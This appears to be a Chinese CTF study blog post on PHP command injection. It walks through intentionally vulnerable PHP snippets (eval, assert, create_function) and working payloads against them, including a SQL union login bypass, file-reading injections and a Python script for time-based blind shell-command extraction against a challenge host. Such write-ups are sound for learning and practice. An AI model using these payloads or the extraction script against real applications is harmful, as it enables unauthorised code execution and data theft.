<!DOCTYPE html>
<html class="has-navbar-fixed-top">
<head>
    <meta charset="utf-8">
<title>PHP命令注入 - ShuYu</title>
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/outdated-browser/1.1.5/outdatedbrowser.min.css">




<meta name="description" content="他浑身都是弱点，简直一无是处，但他靠着自己的力量一步步克服，最终成为了火影">





    <meta name="description" content="命令注入额 没啥，类似于一句话木马的官方话吧常见php命令注入函数eval(),，assert(), system()，preg_replace(), create_function, call_user_func, call_user_func_array，array_map()，反引号，ob_start()，exec()，shell_exec()，passthru()，escapeshellc">
<meta property="og:type" content="article">
<meta property="og:title" content="PHP命令注入">
<meta property="og:url" content="http://example.com/2019/07/13/php%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5/index.html">
<meta property="og:site_name" content="ShuYu">
<meta property="og:description" content="命令注入额 没啥，类似于一句话木马的官方话吧常见php命令注入函数eval(),，assert(), system()，preg_replace(), create_function, call_user_func, call_user_func_array，array_map()，反引号，ob_start()，exec()，shell_exec()，passthru()，escapeshellc">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/2019/07/13/php%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5/2.png">
<meta property="og:image" content="http://example.com/2019/07/13/php%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5/3.png">
<meta property="og:image" content="http://example.com/2019/07/13/php%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5/4.png">
<meta property="og:image" content="http://example.com/2019/07/13/php%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5/5.png">
<meta property="og:image" content="http://example.com/2019/07/13/php%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5/6.png">
<meta property="og:image" content="http://example.com/2019/07/13/php%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5/7.png">
<meta property="og:image" content="http://example.com/2019/07/13/php%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5/1.png">
<meta property="article:published_time" content="2019-07-13T14:46:59.000Z">
<meta property="article:modified_time" content="2020-11-24T04:51:27.807Z">
<meta property="article:author" content="ShuYu">
<meta property="article:tag" content="PHP-Injection">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2019/07/13/php%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5/2.png">





<link rel="icon" href="/images/logo.png">


<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Ovo|Source+Code+Pro">
<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/bulma/0.6.2/css/bulma.min.css">


<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/lightgallery/1.6.8/css/lightgallery.min.css">
<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/justifiedGallery/3.6.5/css/justifiedGallery.min.css">


<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/styles/atom-one-light.min.css">


<link rel="stylesheet" href="/css/style.css">


<script defer src="//use.fontawesome.com/releases/v5.0.8/js/all.js"></script>


    
    
    
    
    
    
    
    
    
    

    


<meta name="generator" content="Hexo 5.2.0"></head>
<body>
    
<nav class="navbar is-transparent is-fixed-top navbar-main" role="navigation" aria-label="main navigation">
    <div class="container">
        <div class="navbar-brand">
            <a class="navbar-item navbar-logo" href="/">
                
                <img src="/images/logo.png" alt="" height="28">
                
            </a>
            <div class="navbar-burger">
                <span></span>
                <span></span>
                <span></span>
            </div>
        </div>
        
        <div class="navbar-menu navbar-start">
            
            <a class="navbar-item "
               href="/archives">Archives</a>
            
            <a class="navbar-item "
               href="/friends">Friends</a>
            
            <a class="navbar-item "
               href="/about">About</a>
            
            <a class="navbar-item "
               href="/tags">Tags</a>
            
        </div>
        
        <div class="navbar-menu navbar-end">
            
            <a class="navbar-item search" title="Search" href="javascript:;">
                <i class="fas fa-search"></i>
            </a>
            
            
            
            <a class="navbar-item" title="GitHub" target="_blank" rel="noopener" href="https://github.com/bkfish">
                
                <i class="fab fa-github"></i>
                
            </a>
               
            
        </div>
    </div>
</nav>

    <section class="section">
    <div class="container">
    <article class="article content gallery" itemscope itemprop="blogPost">
    <h1 class="article-title is-size-3 is-size-4-mobile" itemprop="name">
        
            PHP命令注入
        
    </h1>
    <div class="article-meta columns is-variable is-1 is-multiline is-mobile is-size-7-mobile">
        <span class="column is-narrow">
            
                <time datetime="2019-07-13T14:46:59.000Z" itemprop="datePublished">Jul 13 2019</time>
                <span class="second-date-block"> (Jul 13 2019)</span>
            
        </span>
        
        <span class="column is-narrow article-category">
            <i class="far fa-folder"></i>
            <a class="article-category-link" href="/categories/Web/">Web</a>
        </span>
        
        
        <span class="column is-narrow">
            
            
            9 minutes read (About 1317 words)
        </span>
        
    </div>
    <div class="article-entry is-size-6-mobile" itemprop="articleBody">
    
        <h3 id="命令注入"><a href="#命令注入" class="headerlink" title="命令注入"></a>命令注入</h3><p>额 没啥，类似于一句话木马的官方话吧<br>常见php命令注入函数<br>eval(),，assert(), system()，preg_replace(), create_function, call_user_func, call_user_func_array，array_map()，反引号，ob_start()，exec()，shell_exec()，passthru()，escapeshellcmd()，popen()，proc_open()，pcntl_exec()<br>eval()函数可以把字符串按照PHP代码来执行，换句话说，就是可以动态地执行PHP代码，使用eval函数需要注意的是：输入的字符串必须是合法的PHP代码，且必须以分号结尾。</p>
<a id="more"></a>


<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">	<span class="variable">$myvar</span> = <span class="string">&quot;varname&quot;</span>;</span><br><span class="line">	<span class="variable">$x</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;arg&#x27;</span>];</span><br><span class="line">	<span class="keyword">eval</span>(<span class="string">&quot;\$myvar = <span class="subst">$x</span>;&quot;</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>poc<br><code>/index.php?arg=1;phpinfo()</code></p>
<h3 id="专门聊一下create-function命令注入"><a href="#专门聊一下create-function命令注入" class="headerlink" title="专门聊一下create_function命令注入"></a>专门聊一下create_function命令注入</h3><p>核心</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">如果可控在第一个参数，需要闭合圆括号和大括号：create_function(&#39;)&#123;&#125;phpinfo();&#x2F;&#x2F;&#39;, &#39;&#39;);</span><br><span class="line">如果可控在第二个参数，需要闭合大括号：create_function(&#39;&#39;, &#39;&#125;phpinfo();&#x2F;&#x2F;&#39;);</span><br></pre></td></tr></table></figure>
<h4 id="create-function参数注入"><a href="#create-function参数注入" class="headerlink" title="create_function参数注入"></a>create_function参数注入</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">show_source(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="variable">$act</span> = @<span class="variable">$_GET</span>[<span class="string">&#x27;act&#x27;</span>];</span><br><span class="line"><span class="variable">$arg</span> = @<span class="variable">$_GET</span>[<span class="string">&#x27;arg&#x27;</span>];</span><br><span class="line"><span class="keyword">if</span>(preg_match(<span class="string">&#x27;/^[a-z0-9_]*$/isD&#x27;</span>,<span class="variable">$act</span>)) &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&#x27;check&#x27;</span>;</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="variable">$act</span>(<span class="variable">$arg</span>,<span class="string">&#x27;&#x27;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="string">&#x27;666&#x27;</span>;</span><br></pre></td></tr></table></figure>
<p>poc</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?act&#x3D;\create_function&amp;arg&#x3D;)&#123;&#125;system(&#39;cat &#x2F;ffflll4g&#39;);&#x2F;&#x2F;</span><br></pre></td></tr></table></figure>

<p>ps：2020/5/30 校赛 ：发现用其他函数可以直接执行，支持两个参数的，比如readfile,highlight_file</p>
<h4 id="create-function内容注入"><a href="#create-function内容注入" class="headerlink" title="create_function内容注入"></a>create_function内容注入</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$action</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;action&#x27;</span>] ?? <span class="string">&#x27;&#x27;</span>;</span><br><span class="line"><span class="variable">$arg</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;arg&#x27;</span>] ?? <span class="string">&#x27;&#x27;</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(preg_match(<span class="string">&#x27;/^[a-z0-9_]*$/isD&#x27;</span>, <span class="variable">$action</span>)) &#123;</span><br><span class="line">    show_source(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="variable">$action</span>(<span class="string">&#x27;&#x27;</span>, <span class="variable">$arg</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>poc</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?action&#x3D;\create_function&amp;arg&#x3D;return 2333;&#125;phpinfo();&#x2F;&#x2F;</span><br></pre></td></tr></table></figure>
<h3 id="jarvios的babyphp："><a href="#jarvios的babyphp：" class="headerlink" title="jarvios的babyphp："></a>jarvios的babyphp：</h3><p>jarvios的babyphp<br><img src="2.png"><br>可以目录扫描一下，有.git文件夹泄露<br><img src="3.png"><br>通过githack还原源码<br><img src="4.png"><br>审计发现下面漏洞</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$file</span> = <span class="string">&quot;templates/&quot;</span> . <span class="variable">$page</span> . <span class="string">&quot;.php&quot;</span>;</span><br><span class="line">assert(<span class="string">&quot;strpos(&#x27;<span class="subst">$file</span>&#x27;, &#x27;..&#x27;) === false&quot;</span>) <span class="keyword">or</span> <span class="keyword">die</span>(<span class="string">&quot;Detected hacking attempt!&quot;</span>);</span><br><span class="line">assert(<span class="string">&quot;file_exists(&#x27;<span class="subst">$file</span>&#x27;)&quot;</span>) <span class="keyword">or</span> <span class="keyword">die</span>(<span class="string">&quot;That file doesn&#x27;t exist!&quot;</span>);</span><br></pre></td></tr></table></figure>
<p>首先加上前缀后缀，第二行规则不允许出现两个点，<code>.php</code>已经出现了一个点，所以page参数允许出现点，第二行strpos(xxx,zzz)在xxx中寻找zzz，如果成功返回字符位置，如果没有则返回false就可以注入了<br>比如执行phpinfo();<br>我们传入<code>page=&#39;) or phpinfo();#</code>,如此<code>$file=templates/&#39;) or phpinfo();#.php</code>,为了讲解我没转义，大家需要自己先urldecode<br>然后下面变成</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">assert(<span class="string">&quot;strpos(&#x27;templates/&#x27;) or phpinfo();#.php&#x27;, &#x27;..&#x27;) === false&quot;</span>) <span class="keyword">or</span> <span class="keyword">die</span>(<span class="string">&quot;Detected hacking attempt!&quot;</span>);</span><br><span class="line">assert(<span class="string">&quot;file_exists(&#x27;templates/&#x27;) or phpinfo();#.php&#x27;)&quot;</span>) <span class="keyword">or</span> <span class="keyword">die</span>(<span class="string">&quot;That file doesn&#x27;t exist!&quot;</span>);</span><br></pre></td></tr></table></figure>
<p>我觉得不行啊，#后面注释后句子变成</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">assert(<span class="string">&quot;file_exists(&#x27;templates/&#x27;) or phpinfo();</span></span><br><span class="line"><span class="string">#.php&#x27;)&quot;</span>) <span class="keyword">or</span> <span class="keyword">die</span>(<span class="string">&quot;That file doesn&#x27;t exist!&quot;</span>);</span><br></pre></td></tr></table></figure>
<p>都没闭合<br><img src="5.png"><br>这谁顶得住的，我自己构造<code>page=&#39;) or phpinfo();&quot;)#</code>,缺报错了，黑人问号jpg,我觉得应该是我有语法错误了</p>
<h4 id="！！！以上理解是错误的！！"><a href="#！！！以上理解是错误的！！" class="headerlink" title="！！！以上理解是错误的！！"></a>！！！以上理解是错误的！！</h4><p>从这句分析</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">assert(<span class="string">&quot;strpos(&#x27;templates/&#x27;) or phpinfo();#.php&#x27;, &#x27;..&#x27;) === false&quot;</span>) <span class="keyword">or</span> <span class="keyword">die</span>(<span class="string">&quot;Detected hacking attempt!&quot;</span>);</span><br></pre></td></tr></table></figure>
<p>其实其中的#号没有将后面的注释只是将语句注释了，所以同义为</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">assert(<span class="string">&quot;strpos(&#x27;templates/&#x27;) or phpinfo();&quot;</span>) <span class="keyword">or</span> <span class="keyword">die</span>(<span class="string">&quot;Detected hacking attempt!&quot;</span>);</span><br></pre></td></tr></table></figure>
<p>2333  awsl-所以遇到问题本地多测试一下很重要-ε=ε=ε=┏(゜ロ゜;)┛</p>
<p>然后就可以为所欲为</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">page&#x3D;&#39;) or print_r(file_get_contents(&#39;templates&#x2F;flag.php&#39;));#</span><br><span class="line">转码</span><br><span class="line">page&#x3D;&#39;)%20or%20print_r(file_get_contents(&#39;templates%2fflag.php&#39;))%3b%23</span><br></pre></td></tr></table></figure>
<p><img src="6.png"><br>另外一种构造</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">page&#x3D;&#39;.system(&quot;&#123;PHPCODE&#125;&quot;).&#39;</span><br></pre></td></tr></table></figure>
<p>比如</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">page&#x3D;&#39;.system(&quot;ls&quot;).&#39;</span><br><span class="line">page&#x3D;&#39;.system(&quot;cat templates&#x2F;flag.php;&quot;).&#39;</span><br></pre></td></tr></table></figure>
<p>ps:system 函数是不需要输出的，只要执行了就会输出来,<br>其实发现注入第二个也是可以的-php真玄学<br><img src="7.png"></p>
<h3 id="神塔么shell注入"><a href="#神塔么shell注入" class="headerlink" title="神塔么shell注入"></a>神塔么shell注入</h3><p>一个题先绕过</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$sql</span>=<span class="string">&quot;SELECT username,password FROM admin WHERE username=&#x27;&quot;</span>.<span class="variable">$username</span>.<span class="string">&quot;&#x27;&quot;</span>; <span class="keyword">if</span> (!<span class="keyword">empty</span>(<span class="variable">$row</span>) &amp;&amp; <span class="variable">$row</span>[<span class="string">&#x27;password&#x27;</span>]===md5(<span class="variable">$password</span>))&#123; &#125;</span><br></pre></td></tr></table></figure>
<p>payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">username&#x3D;admin&#39; union select 1,md5(1)%23</span><br><span class="line">password&#x3D;1</span><br></pre></td></tr></table></figure>
<p>然后出现一个shell注入，命令远程会执行，但是没有回显，只有那个一个进程的，盲猜应该是ps -aux | grep {命令}<br><img src="1.png"><br>方法1当然可以直接反弹shell远程，还有一个方法就是shell注入,需要修改一下PHPSESSID<br>注入语句</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">c=123;a=`ls`;b=&#x27;a&#x27;;if [ $&#123;a:0:1&#125; == $b ];then sleep 2;fi</span><br></pre></td></tr></table></figure>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url = <span class="string">&#x27;http://123.206.31.85:49165/index.php&#x27;</span></span><br><span class="line">s = requests.session()</span><br><span class="line">allString = <span class="string">&#x27;&#x27;&#x27;1234567890~`!@#$%^&amp;*()-_=+[]&#123;&#125;;:&#x27;&quot;|\,&lt;.&gt;/?qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM&#x27;&#x27;&#x27;</span></span><br><span class="line"> </span><br><span class="line">database = <span class="string">&#x27;&#x27;</span></span><br><span class="line">flag = <span class="number">1</span></span><br><span class="line">comm =<span class="built_in">input</span>(<span class="string">&#x27;输入指令：&#x27;</span>)</span><br><span class="line">headers = &#123;<span class="string">&#x27;User-Agent&#x27;</span>:<span class="string">&#x27;Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0&#x27;</span>,</span><br><span class="line">            <span class="string">&#x27;Accept&#x27;</span>:<span class="string">&#x27;text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8&#x27;</span>,</span><br><span class="line">            <span class="string">&#x27;Accept-Language&#x27;</span>:<span class="string">&#x27;zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2&#x27;</span>,</span><br><span class="line">            <span class="string">&#x27;Referer&#x27;</span>:<span class="string">&#x27;http://123.206.31.85:49165/index.php&#x27;</span>,</span><br><span class="line">&#125;</span><br><span class="line">cookies = <span class="built_in">dict</span>(PHPSESSID=<span class="string">&#x27;d637ecrlrp3ae9jgqqunu97f22&#x27;</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>,<span class="number">100</span>):<span class="comment">#根据自身需要改长度，如果空格连续出现四次以上，就说明后续没内容了</span></span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> allString:</span><br><span class="line">        <span class="comment">#header = &#123;</span></span><br><span class="line">            <span class="comment">#&quot;X-Forwarded-For&quot;:&quot;1&#x27;+(select case when (ascii(substr(database() from %d for 1))=%d) then sleep(3) else 0 end))#&quot;%(i,ord(j))</span></span><br><span class="line">            <span class="comment">#&#125;</span></span><br><span class="line">        <span class="comment">#print(j)</span></span><br><span class="line">        <span class="keyword">if</span> j == <span class="string">&quot;^&quot;</span>:</span><br><span class="line">            <span class="comment">#print(&#x27;此处有空格&#x27;)</span></span><br><span class="line">            j = <span class="string">&quot; &quot;</span></span><br><span class="line">            data=&#123;<span class="string">&#x27;c&#x27;</span>:<span class="string">&quot;123;a=`&quot;</span>+comm+<span class="string">&quot;`;b=&#x27; &#x27;;if [ $&#123;a:&quot;</span>+<span class="built_in">str</span>(i)+<span class="string">&quot;:1&#125; == $b ];then sleep 4;fi&quot;</span>&#125;</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            data=&#123;<span class="string">&#x27;c&#x27;</span>:<span class="string">&quot;123;a=`&quot;</span>+comm+<span class="string">&quot;`;b=\&#x27;&quot;</span>+<span class="built_in">str</span>(j)+<span class="string">&quot;\&#x27;;if [ $&#123;a:&quot;</span>+<span class="built_in">str</span>(i)+<span class="string">&quot;:1&#125; == $b ];then sleep 4;fi&quot;</span>&#125;</span><br><span class="line">        r = requests.post(url,data=data,headers=headers,cookies=cookies)</span><br><span class="line">        t = r.elapsed.total_seconds()</span><br><span class="line">        <span class="comment">#print(r.text)</span></span><br><span class="line">        print(database+<span class="string">&#x27;     &#x27;</span>+<span class="string">&#x27;the time of &#x27;</span>+j+<span class="string">&#x27; is &#x27;</span>+<span class="built_in">str</span>(t))</span><br><span class="line">        <span class="keyword">if</span> t &gt;= <span class="number">4</span>:</span><br><span class="line">            database = database + j</span><br><span class="line">            print(<span class="string">&#x27;the &#x27;</span>+<span class="built_in">str</span>(i)+<span class="string">&#x27; place of database is &#x27;</span>+j)</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">        <span class="keyword">elif</span> t &lt; <span class="number">4</span> <span class="keyword">and</span> j == <span class="string">&#x27;M&#x27;</span>:</span><br><span class="line">            flag = <span class="number">0</span></span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">    <span class="keyword">if</span> flag == <span class="number">0</span> :</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">print(<span class="string">&#x27;&#x27;</span>,database)</span><br></pre></td></tr></table></figure>
<h3 id="二、love-math"><a href="#二、love-math" class="headerlink" title="二、love_math"></a>二、love_math</h3><p><code>https://github.com/glzjin/ciscn_2019_qual_love_math</code><br><code>http://2fc3da22-d2ec-46f7-8f37-7c134998c844.node3.buuoj.cn/?c=($pi=base_convert)(22950,23,34)($pi(76478043844,9,34)(dechex(109270211243818)))</code></p>
<h3 id="“百度杯”CTF比赛-十月场-hash"><a href="#“百度杯”CTF比赛-十月场-hash" class="headerlink" title="“百度杯”CTF比赛 十月场 hash"></a>“百度杯”CTF比赛 十月场 hash</h3><p>通过别的途径获得源码 得到</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;val&#x27;</span>])) &#123;</span><br><span class="line">    <span class="variable">$val</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;val&#x27;</span>];</span><br><span class="line">    <span class="keyword">eval</span>(<span class="string">&#x27;$value=&quot;&#x27;</span> . addslashes(<span class="variable">$val</span>) . <span class="string">&#x27;&quot;;&#x27;</span>);</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&#x27;hahaha!&#x27;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>首先 addslashes() 函数<br>在每个双引号（”）前添加反斜杠：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line">$str &#x3D; addslashes(&#39;Shanghai is the &quot;biggest&quot; city in China.&#39;);</span><br><span class="line">echo($str); </span><br><span class="line">?&gt; </span><br><span class="line">输出</span><br><span class="line">Shanghai is the \&quot;biggest\&quot; city in China.  </span><br></pre></td></tr></table></figure>
<p>poc</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">?val&#x3D;$&#123;eval($_GET[a])&#125;&amp;a&#x3D;echo &#96;ls&#96;;</span><br><span class="line">?val&#x3D;$&#123;eval($_GET[a])&#125;&amp;a&#x3D;echo &#96;cat True_F1ag_i3_Here_233.php| base64&#96;;</span><br><span class="line">&#96;&#96;&#96; </span><br><span class="line">### X-Forwarded-For可选地址</span><br></pre></td></tr></table></figure>
<p>192.168.0.0<br>172.16.0.0<br>10.0.0.0<br>127.0.0.0<br>localhost</p>
<pre><code>`X-Forwarded-For对应$_SERVER[&#39;HTTP_X_FORWARDED_FOR&#39;]`</code></pre>

    
    </div>
    
    <div class="columns is-variable is-1 is-multiline is-mobile">
    
        <span class="column is-narrow"><a class="tag is-light article-tag" href="/tags/PHP-Injection/">#PHP-Injection</a></span>
    
    </div>
    
    
    <div class="columns is-mobile is-multiline article-nav">
        <span class="column is-12-mobile is-half-desktop  article-nav-prev">
            
            <a href="/2019/07/20/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/">php反序列化漏洞</a>
            
        </span>
        <span class="column is-12-mobile is-half-desktop  article-nav-next">
            
            <a href="/2019/07/13/Redis%E5%93%A8%E5%85%B5%E6%A0%B8%E5%BF%83%E9%80%89%E4%B8%BE%E7%AE%97%E6%B3%95-%E9%80%9A%E8%BF%87%E5%BC%80%E8%BD%A6%E7%90%86%E8%A7%A3quorum%E5%92%8Cmajority%E7%9A%84%E6%84%8F%E4%B9%89/">Redis哨兵核心选举算法-通过开车理解quorum和majority的意义</a>
            
        </span>
    </div>
    
</article>




    </div>
</section>
    <footer class="footer">
    <div class="container">
        <div class="columns content">
            <div class="column is-narrow has-text-centered">
                &copy; 2020 ShuYu&nbsp;
                Powered by <a href="http://hexo.io/" target="_blank">Hexo</a> & <a
                        target="_blank" rel="noopener" href="http://github.com/ppoffice/hexo-theme-minos">Minos</a>
            </div>
            <div class="column is-hidden-mobile"></div>

            
            <div class="column is-narrow">
                <div class="columns is-mobile is-multiline is-centered">
                
                    
                <a class="column is-narrow has-text-black" title="GitHub" target="_blank" rel="noopener" href="https://github.com/bkfish">
                    
                    GitHub
                    
                </a>
                
                </div>
            </div>
            
            
        </div>
    </div>
</footer>
    <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/moment.js/2.22.2/moment-with-locales.min.js"></script>

<!-- test if the browser is outdated -->
<div id="outdated">
    <h6>Your browser is out-of-date!</h6>
    <p>Update your browser to view this website correctly. <a id="btnUpdateBrowser" target="_blank" rel="noopener" href="http://outdatedbrowser.com/">Update my browser now </a></p>
    <p class="last"><a href="#" id="btnCloseUpdateBrowser" title="Close">&times;</a></p>
</div>
<script src="//cdnjs.cloudflare.com/ajax/libs/outdated-browser/1.1.5/outdatedbrowser.min.js"></script>
<script>
    $(document).ready(function () {
        // plugin function, place inside DOM ready function
        outdatedBrowser({
            bgColor: '#f25648',
            color: '#ffffff',
            lowerThan: 'flex'
        })
    });
</script>

<script>
    window.FontAwesomeConfig = {
        searchPseudoElements: true
    }
    moment.locale("en-AU");
</script>


    
    
<script src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.4/MathJax.js?config=TeX-MML-AM_CHTML"></script>
<script>
    MathJax.Hub.Config({
        "HTML-CSS": {
            matchFontHeight: false
        },
        SVG: {
            matchFontHeight: false
        },
        CommonHTML: {
            matchFontHeight: false
        },
        tex2jax: {
            inlineMath: [
                ['$','$'],
                ['\\(','\\)']
            ]
        }
    });
</script>

    
    
    
    
<script src="//cdnjs.cloudflare.com/ajax/libs/lightgallery/1.6.8/js/lightgallery-all.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/justifiedGallery/3.6.5/js/jquery.justifiedGallery.min.js"></script>
<script>
    (function ($) {
        $(document).ready(function () {
            if (typeof($.fn.lightGallery) === 'function') {
                $('.article.gallery').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof($.fn.justifiedGallery) === 'function') {
                $('.justified-gallery').justifiedGallery();
            }
        });
    })(jQuery);
</script>

    
    
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.0/clipboard.min.js"></script>
    <style>
        .hljs {
            position: relative;
        }

        .hljs .clipboard-btn {
            float: right;
            color: #9a9a9a;
            background: none;
            border: none;
            cursor: pointer;
        }

        .hljs .clipboard-btn:hover {
          color: #8a8a8a;
        }

        .hljs > .clipboard-btn {
            display: none;
            position: absolute;
            right: 4px;
            top: 4px;
        }

        .hljs:hover > .clipboard-btn {
            display: inline;
        }

        .hljs > figcaption > .clipboard-btn {
            margin-right: 4px;
        }
    </style>
    <script>
      $(document).ready(function () {
        $('figure.hljs').each(function(i, figure) {
          var codeId = 'code-' + i;
          var code = figure.querySelector('.code');
          var copyButton = $('<button>Copy <i class="far fa-clipboard"></i></button>');
          code.id = codeId;
          copyButton.addClass('clipboard-btn');
          copyButton.attr('data-clipboard-target-id', codeId);

